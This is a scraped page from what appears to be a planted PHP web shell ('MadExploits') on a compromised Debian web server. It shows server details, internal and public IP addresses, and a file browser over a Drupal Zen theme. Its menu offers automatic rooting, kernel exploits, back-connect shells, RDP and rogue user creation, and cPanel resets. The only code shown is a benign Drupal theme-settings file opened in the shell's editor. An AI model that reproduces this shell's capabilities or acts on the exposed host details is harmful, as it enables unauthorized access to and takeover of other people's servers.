Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.147.67.237
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
sites /
all /
themes /
zen /
[ HOME SHELL ]
Name
Size
Permission
Action
STARTERKIT
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
panels-layouts
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
zen-internals
[ DIR ]
drwxr-xr-x
LICENSE.txt
17.67
KB
-rw-r--r--
README-FIRST.txt
3.44
KB
-rw-r--r--
logo.png
664
B
-rw-r--r--
template.php
24.5
KB
-rw-r--r--
theme-settings.php
6.39
KB
-rw-r--r--
zen.info
1.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : theme-settings.php
<?php /** * Implements hook_form_system_theme_settings_alter() function. * * @param $form * Nested array of form elements that comprise the form. * @param $form_state * A keyed array containing the current state of the form. */ function zen_form_system_theme_settings_alter(&$form, $form_state, $form_id = NULL) { // Work-around for a core bug affecting admin themes. See issue #943212. if (isset($form_id)) { return; } // Create the form using Forms API $form['breadcrumb'] = array( '#type' => 'fieldset', '#title' => t('Breadcrumb settings'), ); $form['breadcrumb']['zen_breadcrumb'] = array( '#type' => 'select', '#title' => t('Display breadcrumb'), '#default_value' => theme_get_setting('zen_breadcrumb'), '#options' => array( 'yes' => t('Yes'), 'admin' => t('Only in admin section'), 'no' => t('No'), ), ); $form['breadcrumb']['breadcrumb_options'] = array( '#type' => 'container', '#states' => array( 'invisible' => array( ':input[name="zen_breadcrumb"]' => array('value' => 'no'), ), ), ); $form['breadcrumb']['breadcrumb_options']['zen_breadcrumb_separator'] = array( '#type' => 'textfield', '#title' => t('Breadcrumb separator'), '#description' => t('Text only. Don’t forget to include spaces.'), '#default_value' => theme_get_setting('zen_breadcrumb_separator'), '#size' => 5, '#maxlength' => 10, ); $form['breadcrumb']['breadcrumb_options']['zen_breadcrumb_home'] = array( '#type' => 'checkbox', '#title' => t('Show home page link in breadcrumb'), '#default_value' => theme_get_setting('zen_breadcrumb_home'), ); $form['breadcrumb']['breadcrumb_options']['zen_breadcrumb_trailing'] = array( '#type' => 'checkbox', '#title' => t('Append a separator to the end of the breadcrumb'), '#default_value' => theme_get_setting('zen_breadcrumb_trailing'), '#description' => t('Useful when the breadcrumb is placed just before the title.'), '#states' => array( 'disabled' => array( ':input[name="zen_breadcrumb_title"]' => array('checked' => TRUE), ), ), ); $form['breadcrumb']['breadcrumb_options']['zen_breadcrumb_title'] = array( '#type' => 'checkbox', '#title' => t('Append the content title to the end of the breadcrumb'), '#default_value' => theme_get_setting('zen_breadcrumb_title'), '#description' => t('Useful when the breadcrumb is not placed just before the title.'), ); $form['support'] = array( '#type' => 'fieldset', '#title' => t('Accessibility and support settings'), ); // Only toggle the layout for the main Zen theme. if ($form['var']['#value'] == 'theme_zen_settings') { $form['support']['zen_layout'] = array( '#type' => 'radios', '#title' => t('Layout'), '#options' => array( 'zen-responsive-sidebars' => t('Responsive sidebar layout') . ' <small>(layouts/responsive-sidebars.css)</small>', 'zen-fixed-width' => t('Fixed width layout') . ' <small>(layouts/fixed-width.css)</small>', ), '#default_value' => theme_get_setting('zen_layout'), ); } $form['support']['zen_skip_link_anchor'] = array( '#type' => 'textfield', '#title' => t('Anchor ID for the “skip link”'), '#default_value' => theme_get_setting('zen_skip_link_anchor'), '#field_prefix' => '#', '#description' => t('Specify the HTML ID of the element that the accessible-but-hidden “skip link” should link to. Note: that element should have the <code>tabindex="-1"</code> attribute to prevent an accessibility bug in webkit browsers. (<a href="!link">Read more about skip links</a>.)', array('!link' => 'https://drupal.org/node/467976')), ); $form['support']['zen_skip_link_text'] = array( '#type' => 'textfield', '#title' => t('Text for the “skip link”'), '#default_value' => theme_get_setting('zen_skip_link_text'), '#description' => t('For example: <em>Jump to navigation</em>, <em>Skip to content</em>'), ); $form['support']['zen_html5_respond_meta'] = array( '#type' => 'checkboxes', '#title' => t('Add HTML5 and responsive scripts and meta tags to every page.'), '#default_value' => theme_get_setting('zen_html5_respond_meta'), '#options' => array( 'respond' => t('Add Respond.js JavaScript to add basic CSS3 media query support to IE 6-8.'), 'html5' => t('Add HTML5 shim JavaScript to add support to IE 6-8.'), 'meta' => t('Add meta tags to support responsive design on mobile devices.'), ), '#description' => t('IE 6-8 require a JavaScript polyfill solution to add basic support of HTML5 and CSS3 media queries. If you prefer to use another polyfill solution, such as <a href="!link">Modernizr</a>, you can disable these options. Respond.js only works if <a href="@url">Aggregate CSS</a> is enabled. Mobile devices require a few meta tags for responsive designs.', array('!link' => 'http://www.modernizr.com/', '@url' => url('admin/config/development/performance'))), ); $form['themedev'] = array( '#type' => 'fieldset', '#title' => t('Theme development settings'), ); $form['themedev']['zen_rebuild_registry'] = array( '#type' => 'checkbox', '#title' => t('Rebuild theme registry on every page.'), '#default_value' => theme_get_setting('zen_rebuild_registry'), '#description' => t('During theme development, it can be very useful to continuously <a href="!link">rebuild the theme registry</a>. WARNING: this is a huge performance penalty and must be turned off on production websites.', array('!link' => 'https://drupal.org/node/173880#theme-registry')), ); $form['themedev']['zen_wireframes'] = array( '#type' => 'checkbox', '#title' => t('Add wireframes around main layout elements'), '#default_value' => theme_get_setting('zen_wireframes'), '#description' => t('<a href="!link">Wireframes</a> are useful when prototyping a website.', array('!link' => 'http://www.boxesandarrows.com/view/html_wireframes_and_prototypes_all_gain_and_no_pain')), ); }
Close